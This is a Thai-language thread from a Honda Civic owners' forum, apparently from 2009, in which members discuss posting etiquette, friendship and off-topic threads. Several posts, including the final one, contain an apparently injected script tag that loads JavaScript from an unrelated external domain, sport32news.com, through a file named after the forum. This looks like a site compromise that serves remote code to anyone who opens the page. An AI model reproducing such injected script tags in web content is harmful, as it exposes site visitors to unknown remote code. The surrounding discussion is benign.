ตอบ
ENJOY HONDA

เข้าร่วม: 20 พฤศจิกา 2008
ตอบ: 1346

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1186
ให้คำขอบคุณ: 479

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 15 พฤศจิกา 2009 23:22 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
อืม..เป็นเรื่องละเอียดอ่อนจริงๆครับ... "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: beeladin  hacker 
ES2.0

ชื่อเล่น: ปาล์ม

เข้าร่วม: 17 เมษา 2009
ตอบ: 1013

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1027
ให้คำขอบคุณ: 1000

ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อาทิตย์, 15 พฤศจิกา 2009 23:22 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
ยังไงๆก็คุยกันดีๆแล้วกันนะคับ ใครที่ไม่เข้าใจกติกาการตั้งกระทู้ก็เชิญอ่านกติกาก่อนตั้งซะหน่อย
เสียเวลาอ่านทำความเข้าใจกับมันก่อนแล้วกัน บอร์ด ES เป็นศูนย์รวมของสมาชิกทุกคนช่วยๆกันดูแลหน่อย

ได้รับคำขอบคุณจาก: PAE KUNG  beeladin  ES21_fatboy  hacker  V_ES 
หยวน

ชื่อเล่น: ต้น

เข้าร่วม: 13 กรกฎา 2009
ตอบ: 314

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 794
ให้คำขอบคุณ: 465

ปี: 2001
อาทิตย์, 15 พฤศจิกา 2009 23:33 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
ยังไงผมก็ต้องขอโทษนะคับพี่บี ที่ ตั้งกะทู้ไร สาระขึ้นมานะคับ

ผม เป็นเด็กอะพี่ ไม่รู้เรื่องอะไร ไงก็ อภัยให้ผมด้วย

ขอโทษจากใจจริง
ได้รับคำขอบคุณจาก: VOICEMAN  beeladin  tokykung  ES21_fatboy  boss  CEMENT  hacker  Turngkung P 11  soloshot  ToR79  L  chengg  boatinsane  ES2.0  witnu  stevie_b8 
khaofang

ชื่อเล่น: ฟาง

เข้าร่วม: 01 มีนา 2009
ตอบ: 375

ได้รับคำขอบคุณ: 500
ให้คำขอบคุณ: 581

สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 15 พฤศจิกา 2009 23:43 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
duke_es พิมพ์ว่า:
เข้าใจหลายๆ ท่านนะครับ ต่างคนต่างมีเหตุผล สังคมนี้จะอยู่ได้ก็มีคนหลายประเภทครับ คนจริงจัง คนขําขัน คนธรรมดา คนบ้าบอ ถ้าไม่มีคนเหล่านี้มันคงไม่เป็นสังคม หลายสถานะต่างเหตุผล เมื่อมาอยู่รวมกันก็อาจจะมีผิดพลาดกันบ้างเป็นเรื่องธรรมดาครับ สังคมนี้ก็ย่อมมีคนหลายประเภทอยู่รวมกัน แต่ที่สังคมนี้ไม่เหมือนสังคมอื่นๆคือเรา ขับ ES เหมือนกัน ยังไงทุกคนก็เป็นเพื่อนกันเหมือนเดิม แต่ละคนก็มีเจตนาไม่เหมือนกัน แต่ผมเชื่อครับ ว่าในสังคมนี้ หวังดีกันทุกคน บางคนอาจจะติเพื่อก่อ แต่ไม่ได้ติเพื่อตําหนิแล้วต้องโกรธกันนะครับ ^^

ได้รับคำขอบคุณจาก: beeladin  ES21_fatboy  hacker 
ohmz1541

ชื่อเล่น: โอม

เข้าร่วม: 05 ธันวา 2008
ตอบ: 1977

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2324
ให้คำขอบคุณ: 529

อาทิตย์, 15 พฤศจิกา 2009 23:46 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
ผมว่าก็ไม่เป็นอะไรนะครับ ทำให้ หน้าบอร์ดดูคึกคักดี "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: Rangsit 33  beeladin  ES21_fatboy  boss  hacker  Turngkung P 11  ToR79  chengg  witnu 
jaos

ชื่อเล่น: โจ้

เข้าร่วม: 09 กรกฎา 2009
ตอบ: 534

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 640
ให้คำขอบคุณ: 124

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
จันทร์, 16 พฤศจิกา 2009 07:39 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เห็นด้วยกับท่านประธาน อย่างยิ่ง
ได้รับคำขอบคุณจาก: beeladin  ES21_fatboy  hacker  chengg 
TUI_PeTiTe

เข้าร่วม: 24 สิงหา 2008
ตอบ: 3394

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 11353
ให้คำขอบคุณ: 3321

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 16 พฤศจิกา 2009 07:50 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
ผมว่าการตั้งกระทู้นั้นก็เป็นสิทธิส่วนบุคคลนะครับขอให้อยู่ในกรอบและที่สำคัญผมว่าช่วยกันเถอะครับ
บอร์ดนี้ก็เปรียบเหมือนบ้านของเราหลังนึงควรที่จะช่วยกํนดูแลรักษาครับ...แต่บางครั้งเคยสังเกตุว่า
มีการตั้งกระทู้ที่พร่ำเพื่อ....บางวันผมสังเกตุมีมีกระทู้ที่ตั้งขึ้นมาจาก login เดียวจำนวนหลายกระทู้มาก
พอเปิดเข้าไปอ่านก็ดูแล้วไม่ค่อยมาสาระสักเท่าไรยังไงก็ขอความร่วมมือจากเพื่อนๆพี่ๆน้องๆทุกท่านนะครับ
ก่อนจะตั้งกระทู้อะไรซักกระทู้ควรคิดซักนิดนึงว่าข้อความหรือรายละเอียดในกระทู้ที่จะตั้งนั้นสำคัญหรือมีประโยชน์
มากน้อย แค่ไหน...แต่ผมไม่ได้หมายความว่าห้ามตั้งกระทู้นะครับเพราะทุกคนมีสิทธิ์เท่าเทียมกันครับ
ส่วนตัวผมแล้วตั้งแต่เปิดบ้านใหม่ขึ้นมาผมตั้งกระทู้ขึ้นมาถ้าเดาๆก็ไม่น่าจะเกิน 10 กระทู้ครับนานๆจะเอากะเขาซักที
(แบบว่าไร้สาระบ้างก็มี)แต่ไม่บ่อยเพราะผมคำนึงถึงพื่นที่ของบอร์ดเราเป็นหลัก...เอาเป็นว่าช่วยๆกันหน่อยนะครับ
ทั้งท่านพี่ๆน้องๆเพื่อนสมาชิกทั้งเก่าและใหม่ทุกท่าน....
soloshot

ชื่อเล่น: แฟลช

เข้าร่วม: 17 มิถุนา 2009
ตอบ: 1243

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2428
ให้คำขอบคุณ: 1275

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 16 พฤศจิกา 2009 08:22 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เห็นด้วยครับ
ขอให้อยู่ในกรอบ ไม่ออกทะเลมากเกินไป ก็พอครับ
ได้รับคำขอบคุณจาก: beeladin  ES21_fatboy  hacker 
Hamster@Yamabuchi

ชื่อเล่น: เบิร์ด

เข้าร่วม: 27 มีนา 2009
ตอบ: 2005

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5433
ให้คำขอบคุณ: 3267

ปี: 2005
จันทร์, 16 พฤศจิกา 2009 08:45 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
สำหรับผม ผมมองจากความคิดส่วนตัวผมว่า กระทู้ที่จะตั้งขึ้นมา ขอให้มันอยู่ในกรอบ คือไม่
ล่วงล้ำสิทธิของ ชาติ ศาสนา พระมหากษัตริย์ หรือนำเรื่องละเอียดอ่อนมาพาดพิง ทำให้
เสื่อมเสียหรือไม่เหมาะสมทางคำพูดและการสื่อคำพูดที่อาจทำให้เกิดความเข้าใจคลาดเคลื่อน
ที่มีผลต่อคนอื่นที่เกี่ยวข้องและสังคม และสุดท้าย คือ ไม่ซ้ำซากกระทู้ของเดิมก็พอแล้วครับ

ควรมีการอ่อนตัวบ้าง มันเป็นหลักของธรรมชาติอยู่แล้ว การจะเปลี่ยนแปลงคนกลุ่มใหญ่ใน
สังคมให้อยู่ร่วมกันได้ในสังคมนั้น มันต้องเริ่มจากความสัมพันธ์อันดีมีความอ่อนตัวบ้าง แต่อยู่
ในกรอบที่ควรจะเป็น จึงจะสามารถพัฒนาไปสู่หลักการที่กำหนดไว้ได้..................สำหรับผม
กระทู้ที่นอกเหนือจากที่ผมกล่าวข้างบนแล้ว..............ผมถือว่าโอเคครับ ถึงไม่สร้างประโยชน์
อะไรให้บอร์ดแต่ก้ไม่ทำให้บอร์ดเสียประโยชน์แน่นอนครับ....................

................................................................................................อย่างที่ผมบอกครับ
สังคมหมู่ใหญ่เค้าจะตัดสินกระทู้ดังกล่าวเอง ถ้าคนเค้ามาอ่านเค้าคิดว่าไม่เหมาะ เด๋วเค้าก็คลิก
ปุ่มแจ้งผู้ดูแลบอร์ดมาใช้ดุลยพินิจในการพิจารณาเอง หรือไม่ตอบกระทู้ดังกล่าวก็ได้ แต่ถ้าเค้า
สนใจ เค้าก็จะตอบกระทู้ดังกล่าวไปตามแนวทางที่มันควรจะเป็น หรือตามแนวความคิดของเค้า
ผมว่านี่มันเรื่องธรรมชาติในสังคมอยู่แล้วนี่ครับ

............................................................อีกอย่างนึงผมเห็นด้วยกับพี่บิ๊กกิว่า กระทู้แบบนี้
อย่างน้อยมันสร้างรอยยิ้มให้กับคนที่อ่านทั้งที่อยู่ในเหตุการณ์และไม่อยู่ เพราะจากกระทู้ที่พี่บี
กล่าวมานั้น ผมก็เป็นคนนึงก็ไม่ได้อยู่ในเหตุการณ์นั้น แต่อ่านแล้วผมก็ยังยิ้มครับ..................

ถามว่าเพราะอะไร เชื่อผมเถอะครับทุกคนที่เข้ามาอยู่ในบอร์ดนี้อยากรู้จักกันเป็นการส่วนตัวกับ
ทุกคนแหละครับ แต่บางทีมันติดด้วยโอกาส และเหตุผลที่จะนำเรื่องต่างๆมาคุยกันครับ...........

ผมพูดแบบนี้ เพราะผมคนนึงที่ได้รู้จักเพื่อนใหม่บางคนจากกระทู้แบบนี้ (กระทู้นอกรอบ) เพราะ
วันที่ผมไปมีตติ้งล่าสุด เพื่อนใหม่ดังกล่าวใช้วิธีเข้ามาทักว่า หมวดเบิร์ดครับกินเหล้าใส่ผักกาดหอม
เป็นยังไงบ้างครับ...............หลังจากประโยคนี้ต่างคนต่างหัวเราะ แล้วก็เป็นเพื่อนกัน ขยายบท
สนทนาไปสู่บทอื่นได้ต้อไป..............................

...................................................................สุดท้ายคงกล่าวว่า สำหรับความคิดส่วนตัวผม
ที่พี่บีได้กรุณาเปิดโอกาสให้แสดงออก ผมขอขอบคุณนะครับ อิอิอิอิอิอิ

และผมก็ยังคงยึดมั่นไปในทาง ได้หัวเราะบ้างยิ้มบ้าง แต่อยู่บนพื้นฐานที่ไม่สร้างความเดือนร้อนให้
กับคนอื่นและสังคมครับพี่................เรามีผู้ดูแลที่เราจัดหาไว้ในการพิจารณาความเหมาะสม หรือ
จัดการระบบภายในบอร์ดเราแล้ว...................ผมว่าพี่ๆเค้าต้องตั้งใจทำหน้าที่อย่างดีที่สุด โดยมี
เราเป็นผู้ช่วยเหลือครับ..................

.................................................ผมว่าเราน่าจะเอาเวลามารณรงค์ เรื่องอื่นๆ ก่อนเป็นหลักก่อน
ดีกว่า ไหมครับพี่ เช่น เรื่องการสร้างความสัมพันธ์ ภายในสังคม Civic ES GROUP ให้มันเป็น
กลุ่มก้อนเดียวกัน ซึ่งถือเป็นเรื่อง สำคัญมากๆ ก่อนดีกว่าไหมครับ........................

..............................................................................................ยังไงขอบคุณอีกครั้งครับ
ที่เปิดโอกาสให้ผมแสดงความคิดเห็นครับพี่ หากผมพูดอะไรไม่ถูกใจ โปรดให้อภัยผมด้วยนะครับ
อิอิอิ..................ผมแสดงความรู้สึกจากการใช้สมองทื่อๆและความในใจซั่วๆของผมตามกรอบที่มัน
ควรจะเป็นเท่านั้นเองครับ....................

......................................................หวังว่าพี่ๆและเพื่อนๆทุกคนคงเข้าใจนะครับ...................

....................สุดท้ายผมเชื่อว่า รอยยิ้มและเสียงหัวเราะ มันเป็นบ่อเกิดแห่งความสัมพันธ์ในสังคม
ที่ดีที่สุดครับ.............................เพราะผมก็ได้รับสิ่งนี้มาอย่างท่วมท้น เมื่อผมก้าวเข้ามาใน
Civic ES Group แห่งนี้ครับผม
PAE KUNG

ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 16 พฤศจิกา 2009 09:16 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
พี่ๆว่ายังไงผมก็ว่าตามครับ อยู่ในนี้มาก็นานรุ่นสู่รุ่น เห็นมาก็ไม่น้อยครับ

แต่สิ่งสำคัญที่สุดคือ "มิตรภาพ" ครับ อย่าให้มันเสียไป ครับ

เพราะมัน ไม่ได้เกิดขึ้นมาได้ง่ายๆ ครับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: beeladin  ES21_fatboy  ~ สเตฟาน ~  Turngkung P 11  hacker  Rangsit 33  iMan  V_ES  TUI_PeTiTe  kunshybeer08  chengg  YINDEE  aofkab  witnu  ohm  K_series  SuNsHirO_!!  POD943  stevie_b8 
GuideZ

เข้าร่วม: 01 ตุลา 2008
ตอบ: 837

Guru ES
Guru ES

ได้รับคำขอบคุณ: 776
ให้คำขอบคุณ: 136

จันทร์, 16 พฤศจิกา 2009 09:28 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
TUI_PeTiTe พิมพ์ว่า:
ผมว่าการตั้งกระทู้นั้นก็เป็นสิทธิส่วนบุคคลนะครับขอให้อยู่ในกรอบและที่สำคัญผมว่าช่วยกันเถอะครับ
บอร์ดนี้ก็เปรียบเหมือนบ้านของเราหลังนึงควรที่จะช่วยกํนดูแลรักษาครับ...แต่บางครั้งเคยสังเกตุว่า
มีการตั้งกระทู้ที่พร่ำเพื่อ....บางวันผมสังเกตุมีมีกระทู้ที่ตั้งขึ้นมาจาก login เดียวจำนวนหลายกระทู้มาก
พอเปิดเข้าไปอ่านก็ดูแล้วไม่ค่อยมาสาระสักเท่าไรยังไงก็ขอความร่วมมือจากเพื่อนๆพี่ๆน้องๆทุกท่านนะครับ
ก่อนจะตั้งกระทู้อะไรซักกระทู้ควรคิดซักนิดนึงว่าข้อความหรือรายละเอียดในกระทู้ที่จะตั้งนั้นสำคัญหรือมีประโยชน์
มากน้อย แค่ไหน...แต่ผมไม่ได้หมายความว่าห้ามตั้งกระทู้นะครับเพราะทุกคนมีสิทธิ์เท่าเทียมกันครับ
ส่วนตัวผมแล้วตั้งแต่เปิดบ้านใหม่ขึ้นมาผมตั้งกระทู้ขึ้นมาถ้าเดาๆก็ไม่น่าจะเกิน 10 กระทู้ครับนานๆจะเอากะเขาซักที
(แบบว่าไร้สาระบ้างก็มี)แต่ไม่บ่อยเพราะผมคำนึงถึงพื่นที่ของบอร์ดเราเป็นหลัก...เอาเป็นว่าช่วยๆกันหน่อยนะครับ
ทั้งท่านพี่ๆน้องๆเพื่อนสมาชิกทั้งเก่าและใหม่ทุกท่าน....

ชอบกระทู้พี่มากครับ 18+
ได้รับคำขอบคุณจาก: beeladin  ~ สเตฟาน ~  ES21_fatboy  Turngkung P 11  hacker  TUI_PeTiTe  kunshybeer08  kittidech  YINDEE  Hamster@Yamabuchi  K_series  stevie_b8 
marijuanna

เข้าร่วม: 19 เมษา 2009
ตอบ: 241

ได้รับคำขอบคุณ: 210
ให้คำขอบคุณ: 5
จันทร์, 16 พฤศจิกา 2009 09:38 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
มันเกี่ยวกันยังไงวะ ไกด์ คิคิ
ได้รับคำขอบคุณจาก: ES21_fatboy  beeladin  hacker 
watchara4

ชื่อเล่น: เอท

เข้าร่วม: 04 พฤษภาคม 2009
ตอบ: 1565

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1917
ให้คำขอบคุณ: 3446

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 16 พฤศจิกา 2009 09:39 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
ดีครับผม
ได้รับคำขอบคุณจาก: ES21_fatboy  beeladin  hacker 
ToR79

ชื่อเล่น: ต่อ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 352

ได้รับคำขอบคุณ: 584
ให้คำขอบคุณ: 759

สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 16 พฤศจิกา 2009 09:59 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
ความรู้สึกของผมนะครับ ผมว่าไม่เห็นจะแปลกตรงไหนเรื่องการตั้งกระทู้อ่ะครับ ที่ผ่านๆ มาก็มีทั้งสาระ และไม่มีสาระ ผมว่ามันเป็นสีสันดีออก และอีกอย่างนึง คนที่เข้ามาเล่นบอร์ดก็มีมากหน้าหลายตา อยู่กันทั่วประเทศไทย ต่างคนต่างความคิดอ่ะครับ ความคิดบางคน อ่านแล้วอาจจะไม่เห็นด้วย ไม่ happy แต่บางคนที่อ่านอาจจะไม่คิดอะไรก็ได้ ถ้ามันเป็น general talk ก็หมายถึงเรื่องทั่วไปอะไรก็ได้ที่ไม่ผิดกฎของบอร์ด ผมว่าอย่าคิดมากดีกว่าครับ ยังไงก็คนคอเดียวกันทั้งนั้น... ขอโทษนะครับ ถ้าการแสดงความคิดเห็นของผมอาจจะไม่ถูกใจใครๆ ไปบ้างอ่ะครับ
poopae2010

เข้าร่วม: 13 ตุลา 2008
ตอบ: 161

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 189
ให้คำขอบคุณ: 2
จันทร์, 16 พฤศจิกา 2009 10:10 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
ไปปายกานนนป่าววว พี่น้องงงงงง
ได้รับคำขอบคุณจาก: hacker  kittidech  TUI_PeTiTe 
BeeBird

ชื่อเล่น: เบิร์ด

เข้าร่วม: 14 ตุลา 2009
ตอบ: 479

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 756

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 16 พฤศจิกา 2009 10:21 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
โดนใจในหลายๆแง่ครับ ... เปิดใจกว้างๆไว้ครับ อยู่ด้วยกันเป็นสังคมส่วนรวมเนอะ
ได้รับคำขอบคุณจาก: beeladin  hacker  kittidech  ~ สเตฟาน ~  K_series  witnu 
VOICEMAN

ชื่อเล่น: ตั้ม

ตอบ: 1188

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1621
ให้คำขอบคุณ: 3177

จันทร์, 16 พฤศจิกา 2009 12:49 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
ทุกปัญหามันจะมีทาง ออก เสมอครับ เรามาทำให้บ้านนี้เป็นบ้านที่มีความสุขกัน รัก พี่ๆ เพื่อนๆ น้องๆ ES ทุกท่านครับ
ได้รับคำขอบคุณจาก: hacker  L  kittidech  ~ สเตฟาน ~  beeladin  YINDEE  Hamster@Yamabuchi  witnu  K_series 
V_ES

ชื่อเล่น: วี คับ

เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 590

ได้รับคำขอบคุณ: 464
ให้คำขอบคุณ: 926

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 16 พฤศจิกา 2009 13:15 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เครียดบ้าง...ยิ้มบ้าง...หัวเราะบ้าง...มันคือสีสันคับ ยังงัยก็ ES เหมือนกัน มิตรภาพสำคัญสุดคับ......
ได้รับคำขอบคุณจาก: hacker  kittidech  ~ สเตฟาน ~  beeladin  K_series 
msnjoey

เข้าร่วม: 01 มิถุนา 2009
ตอบ: 347

ได้รับคำขอบคุณ: 314
ให้คำขอบคุณ: 745

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 16 พฤศจิกา 2009 13:19 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เห็นด้วยคราบบบบ...
ได้รับคำขอบคุณจาก: hacker  kittidech  beeladin  VOICEMAN 
CHAMP_ME16

ชื่อเล่น: แชมป์

เข้าร่วม: 11 กันยา 2009
ตอบ: 3113

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2265
ให้คำขอบคุณ: 891

จันทร์, 16 พฤศจิกา 2009 13:25 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เห็นด้วยครับแต่ก็อย่าเอาเรื่องแค่นี้มาเป็นอารมณ์กันน่ะครับยังไงก็ ESทั้งนั้นครับ
ได้รับคำขอบคุณจาก: hacker  kittidech  ~ สเตฟาน ~  beeladin  VOICEMAN 
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

จันทร์, 16 พฤศจิกา 2009 13:26 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เห็นด้วยกับไกด์ครับ 18+

เอ้ย... นอกเรื่องอีกแล้วผม

--------------------------------------------------------------------------

พี่ๆน้องๆ ชอบเสียงกีต้าร์ไหมครับ

การตั้งสายกีต้าร์ ถ้าจะให้เสียงใสๆ เพราะๆ ก็ตั้งให้ตึงๆ แน่นๆ แต่มันจะหมายถึงคนเล่นที่จะต้องทรมานในการใช้นิ้วกด
การตั้งสายกีต้าร์แบบอ่อนๆ ก็อาจจะเสียงไม่ดีเท่าที่ควร แต่คนเล่นก็เล่นได้อย่างสบาย ไม่ทรมานเวลากดคอร์ด

ฉันใดฉันนั้นครับ ตึงบ้างหย่อนบ้าง หลายคน หลายความคิด หลายมุมมอง
ต้องขอขอบคุณหลายๆคนที่ออกมาแสดงความคิดเห็นเพราะจุดที่พวกเรายืนล้วนแตกต่างกัน

คนเก่งเรียนรู้จากข้อผิดพลาดของตัวเอง คนเพอร์เฟคเรียนรู้จากข้อผิดพลาดของตัวเองและของคนอื่น

ผมเป็นคนหนึ่งแหละที่ออกแนวไร้สาระมากว่ามีสาระ แต่คำว่าไร้สาระของผมมันคือ " ไลฟ์'s สาระ "
Life's สาระ
ชีวิตที่มีสาระ

อยากฝากไว้ครับ
Everything alway has 2 sides!
ทุกๆอย่างมี 2 ด้านเสมอครับ

ครอบครัว ES อบอุ่นเสมอครับ อย่างไหนชี้แนะกันได้ก็ชี้แนะกันครับ ผมเชื่อว่าเรื่องเล็ก ไม่มีใครโกรธใครหรอก

แก้ไขล่าสุดโดย เมื่อ จันทร์, 16 พฤศจิกา 2009 13:49, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
Note Panu

เข้าร่วม: 03 กันยา 2009
ตอบ: 434

ได้รับคำขอบคุณ: 502
ให้คำขอบคุณ: 191

จันทร์, 16 พฤศจิกา 2009 13:30 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เข้าใจทั้งคู่เลยนะครับ อยากให้เราลองเปิดใจกันมากกว่าเพราะที่ติก้อน่าจะติเพื่อก่อมากกว่าทำงายอ่ะครับ
บางครั้งก็มีบ้างที่มีกระทู้ประเภทนี้มาคนที่อยู่ตจว.หรือไม่เคยเข้า Meeting อาจจะไม่ทราบด้วย แต่ทั้งนี้ทั้งนั้นเข้าใจว่าคงเน้นที่ความเฮฮาของเจ้าของกระทู้มากกว่าจะก่อให้เกิดการแบ่งพรรคแบ่งพวก ยังไงก้อครบอครัวเดียวกัน เจอกันก้อปรึกษาหาทางออกกันอีกทีก็ได้ครับ อิอิ .... เรืองเล้กเชื่อว่าไม่มีใครดกรธกันเเน่นอนครับ คริคริ
ได้รับคำขอบคุณจาก: hacker  kittidech  chengg  ~ สเตฟาน ~  beeladin  VOICEMAN 
watzang

ชื่อเล่น: วัช

เข้าร่วม: 17 มิถุนา 2009
ตอบ: 192

ได้รับคำขอบคุณ: 113
ให้คำขอบคุณ: 32

จันทร์, 16 พฤศจิกา 2009 14:27 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ

อ่านดูแล้ว เห็นด้วยครับ !! เหตุผลที่พี่บี กล่าวมา ผมอ่านแล้วอาจทำให้ ES รู้สึกเป็นเพื่อนกันมากขึ้นและรู้จักกันมากขึ้นกว่านี้นะ
ได้รับคำขอบคุณจาก: kittidech  ~ สเตฟาน ~  beeladin  VOICEMAN  hacker 
kunshybeer08

เข้าร่วม: 02 ตุลา 2008
ตอบ: 914

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1063
ให้คำขอบคุณ: 1702

จันทร์, 16 พฤศจิกา 2009 14:29 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เซียนจ๊อบเล่นซ่ะเคลิ้มเลย

ปล.เห็นด้วยเหมือนกะพี่หมวดครับ
ได้รับคำขอบคุณจาก: kittidech  chengg  ~ สเตฟาน ~  beeladin  VOICEMAN  Hamster@Yamabuchi  hacker 
ohm

ชื่อเล่น: โอม

ตอบ: 1081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3634
ให้คำขอบคุณ: 3340

จันทร์, 16 พฤศจิกา 2009 14:33 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
มักจะพูดกันว่า สังคมเรากว้างขวาง เราก็ควรเปิดใจให้กว้าง การเปิดใจให้กว้างก่อให้เกิด มิตรไมตรี มิตรภาพที่ดีต่อๆกันไปในสังคม
การเป็นทั้งผู้รับฟังที่ดี เป็นผู้ให้ แบ่งปันความรู้ดีๆที่เรามี และสิ่งสุดท้าย การมีน้ำใจให้ซึ่งกันและกัน ก่อให้เกิดสิ่งที่เรียกว่า เพื่อนกัน มานักต่อนัก

มิตรภาพจะก่อเกิดได้ โดยการ หันหน้าเข้ามาคุยกัน และเราจะแนบแน่นยิ่งๆขึ้นไป เติบโตยิ่งๆขึ้นไป
เห็นด้วยกับท่านทั้งสอง ขอให้พูดคุยกัน เข้าใจกันได้ด้วยดี นะครับ
ขอบคุณมิตรภาพดีๆ ทั้งในนี้และข้างนอกที่ผมได้รับ มาจากบ้านแห่งนี้ ที่ชื่อ civicESgroup ครับ

แก้ไขล่าสุดโดย เมื่อ จันทร์, 16 พฤศจิกา 2009 14:35, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
Rangsit 33

ตอบ: 2276

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3688
ให้คำขอบคุณ: 1582

จันทร์, 16 พฤศจิกา 2009 14:34 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
hacker พิมพ์ว่า:
เห็นด้วยกับไกด์ครับ 18+

เอ้ย... นอกเรื่องอีกแล้วผม

--------------------------------------------------------------------------

พี่ๆน้องๆ ชอบเสียงกีต้าร์ไหมครับ

การตั้งสายกีต้าร์ ถ้าจะให้เสียงใสๆ เพราะๆ ก็ตั้งให้ตึงๆ แน่นๆ แต่มันจะหมายถึงคนเล่นที่จะต้องทรมานในการใช้นิ้วกด
การตั้งสายกีต้าร์แบบอ่อนๆ ก็อาจจะเสียงไม่ดีเท่าที่ควร แต่คนเล่นก็เล่นได้อย่างสบาย ไม่ทรมานเวลากดคอร์ด

ฉันใดฉันนั้นครับ ตึงบ้างหย่อนบ้าง หลายคน หลายความคิด หลายมุมมอง
ต้องขอขอบคุณหลายๆคนที่ออกมาแสดงความคิดเห็นเพราะจุดที่พวกเรายืนล้วนแตกต่างกัน

คนเก่งเรียนรู้จากข้อผิดพลาดของตัวเอง คนเพอร์เฟคเรียนรู้จากข้อผิดพลาดของตัวเองและของคนอื่น

ผมเป็นคนหนึ่งแหละที่ออกแนวไร้สาระมากว่ามีสาระ แต่คำว่าไร้สาระของผมมันคือ " ไลฟ์'s สาระ "
Life's สาระ
ชีวิตที่มีสาระ

อยากฝากไว้ครับ
Everything alway has 2 sides!
ทุกๆอย่างมี 2 ด้านเสมอครับ

ครอบครัว ES อบอุ่นเสมอครับ อย่างไหนชี้แนะกันได้ก็ชี้แนะกันครับ ผมเชื่อว่าเรื่องเล็ก ไม่มีใครโกรธใครหรอก

....... แหมมมมม......คมคายจิงๆ ..... เกือบหล่อแระ ....แต่ว่าๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆ

-------------- Everything always has 2 sides ---------------

............. always .......... ต้องมี S เสมอนะ............... ....จาก คิด.....ดีลิเวอรี่ๆๆๆ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
